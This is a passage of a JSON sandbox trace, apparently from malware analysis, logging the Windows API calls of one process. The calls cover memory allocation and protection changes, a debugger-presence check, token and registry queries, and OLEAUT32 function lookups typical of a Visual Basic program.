"status": true, "return": "0x04aa0000", "arguments": [ { "name": "Options", "value": "0" }, { "name": "InitialSize", "value": "0x00001000" }, { "name": "MaximumSize", "value": "0x00000000" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x7650c041", "parentcaller": "0x731ff93e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04ab0000" }, { "name": "RegionSize", "value": "0x00400000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x7650c041", "parentcaller": "0x731ff957", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04ab0000" }, { "name": "RegionSize", "value": "0x00010000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04aa1000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764fc461", "parentcaller": "0x732001b3", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "KERNEL32" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsProcessorFeaturePresent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880e10" } ], "repeated": 0, "id": 7 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764e15a7", "parentcaller": "0x764e14c4", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000022c" }, { "name": "MutexName", "value": "" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764fb5e0", "parentcaller": "0x764e3555", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\x01{\\x98\\x02\\x00\\x00\\x00\\x00U\\xef\n\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xf2\\x8a\\x98\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764fb61e", "parentcaller": "0x764e3555", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xc0\\x02\\xffj\\x15\\xa1\\x90\\x1f\\xe9MK" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-02-27 23:34:13,831", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\bcryptprimitives" }, { "name": "BaseAddress", "value": "0x76370000" }, { "name": "InitRoutine", "value": "0x763a3790" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-02-27 23:34:13,831", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76fdf000" }, { "name": "ModuleName", "value": "RPCRT4.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-02-27 23:34:13,831", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76fdf000" }, { "name": "ModuleName", "value": "RPCRT4.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-02-27 23:34:13,831", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00725000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-02-27 23:34:13,831", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75288000" }, { "name": "ModuleName", "value": "combase.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-02-27 23:34:13,831", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75288000" }, { "name": "ModuleName", "value": "combase.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-02-27 23:34:13,847", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\uxtheme" }, { "name": "DllBase", "value": "0x74e80000" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll" }, { "name": "BaseAddress", "value": "0x74e80000" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x74e80000" }, { "name": "FunctionName", "value": "ThemeInitApiHook" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74eb4060" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "IsDebuggerPresent", "status": false, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 113 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "H\\xf4\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfd;\\xebt\\xbbiT\\x12\\xe0\\xf4\\x19\\x00\\x0e<\\xebt" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000248" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000248" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "ValueName", "value": "AppsUseLightTheme" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000248" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x0000024c" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "OleDropTargetInterface" }, { "name": "Atom", "value": "0x0000c01e" } ], "repeated": 0, "id": 123 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "OleDropTargetMarshalHwnd" }, { "name": "Atom", "value": "0x0000c01f" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "OLEAUT32.DLL" }, { "name": "BaseAddress", "value": "0x76d90000" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "OleLoadPictureEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfc8e0" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "HeapCreate", "status": true, "return": "0x023a0000", "arguments": [ { "name": "Options", "value": "0" }, { "name": "InitialSize", "value": "0x00000400" }, { "name": "MaximumSize", "value": "0x00000000" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "GetSystemInfo", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 129 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00010000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "NumberOfBytesProtected", "value": "0x00006000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "VBDisabled" }, { "name": "Atom", "value": "0x0000c090" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "DispCallFunc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc8c70" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "LoadTypeLibEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76db0ce0" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "UnRegisterTypeLib" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76de11b0" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "CreateTypeLib2" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc5290" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDateFromUdate" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc07c0" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarUdateFromDate" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da6ef0" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "GetAltMonthNames" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df7d40" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarNumFromParseNum" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da7670" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarParseNumFromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daedb0" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecFromR4" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfd490" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecFromR8" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfd6f0" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecFromDate" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfd2f0" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecFromI4" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfd3e0" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecFromCy" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfd2b0" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarR4FromDec" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfdd10" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "GetRecordInfoFromTypeInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfbed0" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "GetRecordInfoFromGuids" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfbde0" } ], "repeated": 0, "id": 156 }, { "timestamp": 